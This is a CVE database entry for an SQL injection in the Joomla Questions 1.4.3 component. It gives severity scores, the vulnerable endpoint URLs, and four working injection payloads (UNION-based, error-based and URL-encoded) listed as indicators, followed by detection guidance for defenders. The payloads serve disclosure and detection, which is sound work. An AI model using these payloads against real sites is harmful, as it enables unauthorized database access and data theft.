cbcvebase.
CVE-2018-17377
published 2018-09-28

CVE-2018-17377: SQL Injection exists in the Questions 1.4.3 component for Joomla! via the term, userid, users, or groups parameter.

PriorityP266critical9.8CVSS 3.0
AVNACLPRNUINSUCHIHAH
EXPLOIT
EPSS
3.21%
86.6th percentile
SQL Injection exists in the Questions 1.4.3 component for Joomla! via the term, userid, users, or groups parameter.

Affected

1 ranges
VendorProductVersion rangeFixed in
extensiondeveloperquestions

Detection & IOCsextracted from sources · hover to see the quote

urlindex.php?option=com_questions&tmpl=component&task=quazax.getusers&term=[SQL]
urlindex.php?option=com_questions&tmpl=component&task=quazax.sendnotification&userid=[SQL]&users=[SQL]&groups=[SQL]
urlindex.php?option=com_questions&tmpl=component&task=quazax.addnewgroup&group_name=[SQL]
command66' UNION ALL SELECT NULL,NULL,CONCAT((SELECT+(@x)+FROM+(SELECT+(@x:=0x00),(@NR_DB:=0),(SELECT+(0)+FROM+(INFORMATION_SCHEMA.SCHEMATA)+WHERE+(@x)+IN+(@x:=CONCAT(@x,LPAD(@NR_DB:=@NR_DB%2b1,2,0x30),0x20203a2020,schema_name,0x3c62723e))))x))--+-
command66' AND (SELECT 8948 FROM(SELECT COUNT(*),CONCAT(CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),(SELECT (ELT(8948=8948,1))),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- Efe
command66 OR (SELECT 1 FROM(SELECT COUNT(*),CONCAT(version(),(SELECT (ELT(1=1,1))),0x7e7e496873616e53656e63616e,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
command%27%20%2f%2a%21%35%30%30%30%30%50%72%6f%63%65%64%75%72%65%2a%2f%20%2f%2a%21%35%30%30%30%30%41%6e%61%6c%79%73%65%2a%2f%20%28%65%78%74%72%61%63%74%76%61%6c%75%65%28%30%2c%2f%2a%21%35%30%30%30%30%63%6f%6e%63%61%74%2a%2f%28%30%78%32%37%2c%30%78%34%39%36%38%37%33%36%31%36%65%32%30%35%33%36%35%36%65%36%33%36%31%36%65%2c%30%78%33%61%2c%40%40%76%65%72%73%69%6f%6e%29%29%2c%30%29%2d%2d%20%2d
  • Monitor HTTP requests targeting the Joomla com_questions component across three vulnerable tasks: quazax.getusers (term parameter), quazax.sendnotification (userid, users, groups parameters), and quazax.addnewgroup (group_name parameter) for SQL injection payloads.
  • Detect requests to index.php containing 'option=com_questions' combined with 'task=quazax.getusers', 'task=quazax.sendnotification', or 'task=quazax.addnewgroup' as indicators of exploitation attempts against this component.
  • Look for UNION-based and error-based (FLOOR(RAND(0)*2) GROUP BY) SQL injection patterns in query parameters of com_questions requests, particularly referencing INFORMATION_SCHEMA.SCHEMATA or INFORMATION_SCHEMA.PLUGINS.
  • Detect URL-encoded MySQL versioned comment injection (/*!50000Procedure*/ / /*!50000Analyse*/) in the group_name parameter of quazax.addnewgroup requests, as used in the third POC payload.
  • ·All POC URLs use 'localhost' as the host and '[PATH]' as a placeholder; replace with the actual target host and Joomla installation path when writing detection signatures.
  • ·The vulnerability is specific to Questions component version 1.4.3 for Joomla!; detections should be scoped to this component version to reduce false positives.

CVSS provenance

nvdv3.09.8CRITICALCVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.07.5HIGHAV:N/AC:L/Au:N/C:P/I:P/A:P
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.